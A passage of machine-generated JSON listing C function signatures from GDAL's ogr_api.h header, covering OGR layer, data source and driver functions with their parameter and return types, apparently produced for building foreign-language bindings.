"OGR_L_GetSpatialFilter", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:519:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_L_SetSpatialFilter", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:520:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_L_SetSpatialFilterRect", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:521:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_L_SetSpatialFilterEx", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:523:18", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "iGeomField", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "hGeom", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_L_SetSpatialFilterRectEx", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:525:18", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "iGeomField", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "dfMinX", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfMinY", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfMaxX", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfMaxY", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_L_SetAttributeFilter", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:528:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_ResetReading", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:529:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_L_GetNextFeature", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:530:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": "OGRFeatureH" } }, { "tag": "function", "name": "OGR_L_SetNextByIndex", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:578:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "GIntBig" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_GetFeature", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:579:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "GIntBig" } }], "return-type": { "tag": "OGRFeatureH" } }, { "tag": "function", "name": "OGR_L_SetFeature", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:580:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_CreateFeature", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:581:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_DeleteFeature", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:582:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "GIntBig" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_GetLayerDefn", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:583:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": "OGRFeatureDefnH" } }, { "tag": "function", "name": "OGR_L_GetSpatialRef", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:584:30", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": "OGRSpatialReferenceH" } }, { "tag": "function", "name": "OGR_L_FindFieldIndex", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:585:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "bExactMatch", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_L_GetFeatureCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:586:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "GIntBig" } }, { "tag": "function", "name": "OGR_L_GetExtent", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:587:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "OGREnvelope" } } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_GetExtentEx", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:588:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "iGeomField", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "psExtent", "type": { "tag": ":pointer", "type": { "tag": "OGREnvelope" } } }, { "tag": "parameter", "name": "bForce", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_TestCapability", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:590:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_L_CreateField", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:591:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRFieldDefnH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_CreateGeomField", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:592:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hLayer", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "hFieldDefn", "type": { "tag": "OGRGeomFieldDefnH" } }, { "tag": "parameter", "name": "bForce", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_DeleteField", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:594:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "iField", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_ReorderFields", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:595:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "panMap", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_ReorderField", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:596:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "iOldFieldPos", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "iNewFieldPos", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_AlterFieldDefn", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:597:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "iField", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "hNewFieldDefn", "type": { "tag": "OGRFieldDefnH" } }, { "tag": "parameter", "name": "nFlags", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_StartTransaction", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:598:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_CommitTransaction", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:599:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_RollbackTransaction", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:600:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_Reference", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:602:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_L_Dereference", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:603:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_L_GetRefCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:604:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_L_SyncToDisk", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:606:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_GetFeaturesRead", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:608:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": "GIntBig" } }, { "tag": "function", "name": "OGR_L_GetFIDColumn", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:610:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_L_GetGeometryColumn", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:611:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_L_GetStyleTable", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:613:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": "OGRStyleTableH" } }, { "tag": "function", "name": "OGR_L_SetStyleTableDirectly", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:615:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRStyleTableH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_L_SetStyleTable", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:617:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRStyleTableH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_L_SetIgnoredFields", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:618:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_Intersection", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:619:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_Union", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:620:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_SymDifference", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:621:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_Identity", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:622:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_Update", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:623:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_Clip", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:624:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_L_Erase", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:625:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_DS_Destroy", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:629:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_DS_GetName", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:630:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_DS_GetLayerCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:631:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_DS_GetLayer", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:632:19", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRLayerH" } }, { "tag": "function", "name": "OGR_DS_GetLayerByName", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:633:19", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "OGRLayerH" } }, { "tag": "function", "name": "OGR_DS_DeleteLayer", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:634:19", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_DS_GetDriver", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:635:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }], "return-type": { "tag": "OGRSFDriverH" } }, { "tag": "function", "name": "OGR_DS_CreateLayer", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:636:19", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRSpatialReferenceH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRwkbGeometryType" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": "OGRLayerH" } }, { "tag": "function", "name": "OGR_DS_CopyLayer", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:639:19", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": "OGRLayerH" } }, { "tag": "function", "name": "OGR_DS_TestCapability", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:641:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_DS_ExecuteSQL", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:642:19", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "OGRLayerH" } }, { "tag": "function", "name": "OGR_DS_ReleaseResultSet", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:644:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_DS_Reference", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:646:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_DS_Dereference", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:647:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_DS_GetRefCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:648:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_DS_GetSummaryRefCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:649:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_DS_SyncToDisk", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:652:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_DS_GetStyleTable", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:654:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }], "return-type": { "tag": "OGRStyleTableH" } }, { "tag": "function", "name": "OGR_DS_SetStyleTableDirectly", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:656:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRStyleTableH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_DS_SetStyleTable", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:658:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRStyleTableH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_Dr_GetName", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:662:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRSFDriverH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_Dr_Open", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:663:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRSFDriverH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRDataSourceH" } }, { "tag": "function", "name": "OGR_Dr_TestCapability", "ns": 0, "location": 